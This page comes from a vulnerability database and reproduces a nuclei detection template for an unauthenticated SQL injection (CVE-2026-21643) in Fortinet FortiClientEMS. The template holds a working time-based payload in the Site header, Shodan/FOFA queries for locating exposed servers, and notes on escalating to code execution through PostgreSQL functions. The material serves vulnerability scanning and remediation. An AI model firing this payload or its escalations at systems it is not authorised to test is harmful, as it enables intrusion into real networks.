Lucene search
K

Fortinet FortiClientEMS 7.4.4 - SQL Injection

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 12 Views

Fortinet FortiClientEMS 7.4.4 has unauthenticated SQL injection via /api/v1/init_consts Site header.

Related
Refs
Code
id: CVE-2026-21643

info:
  name: Fortinet FortiClientEMS 7.4.4 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    Fortinet FortiClientEMS version 7.4.4 and earlier contains an unauthenticated SQL injection vulnerability in the /api/v1/init_consts endpoint. The 'Site' HTTP header value is passed directly into the PostgreSQL search_path without sanitization, allowing remote unauthenticated attackers to inject arbitrary SQL commands. This can lead to information disclosure, database manipulation, or OS command execution when chained with PostgreSQL functions.
  impact: |
    An unauthenticated remote attacker can execute arbitrary SQL queries against the backend PostgreSQL database, potentially extracting sensitive data, modifying database contents, or achieving remote code execution through PostgreSQL-specific functions (e.g., COPY, lo_import, pg_read_file).
  remediation: |
    Upgrade FortiClientEMS to a patched version as recommended by Fortinet. As a workaround, restrict network access to the FortiClientEMS management interface and apply WAF rules to filter malicious Site header values.
  reference:
    - https://www.fortiguard.com/psirt/FG-IR-2026-21643
    - https://nvd.nist.gov/vuln/detail/CVE-2026-21643
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-21643
    cwe-id: CWE-89
    epss-score: 0.94085
    epss-percentile: 0.99836
  metadata:
    verified: false
    max-request: 2
    vendor: fortinet
    product: forticlientems
    shodan-query: http.favicon.hash:-800551065
    fofa-query: icon_hash="-800551065"
  tags: cve,cve2026,sqli,forticlient,ems,fortinet,,vkev,kev

http:
  - raw:
      - |
        GET /api/v1/init_consts HTTP/1.1
        Host: {{Hostname}}

      - |
        @timeout: 20s
        GET /api/v1/init_consts HTTP/1.1
        Host: {{Hostname}}
        Site: tenant1; SELECT pg_sleep(8)--

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_1, "SITES_ENABLED\": true")'

      - type: dsl
        name: time-based
        dsl:
          - "duration_2>=8"
          - "status_code_2 == 500"
        condition: and
# digest: 4a0a00473045022002f72dc723fdeffaf24921d5b4a92545ba62945ba205d9696b18f9c0a1cc1c2c0221009eb3a644dfa2d8062e0bfe333f300727ab48739f277e7a2a991902d6762e2ab5:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Apr 2026 14:50Current
7.7High risk
Vulners AI Score7.7
CVSS 3.19.8
EPSS0.94085
SSVC
12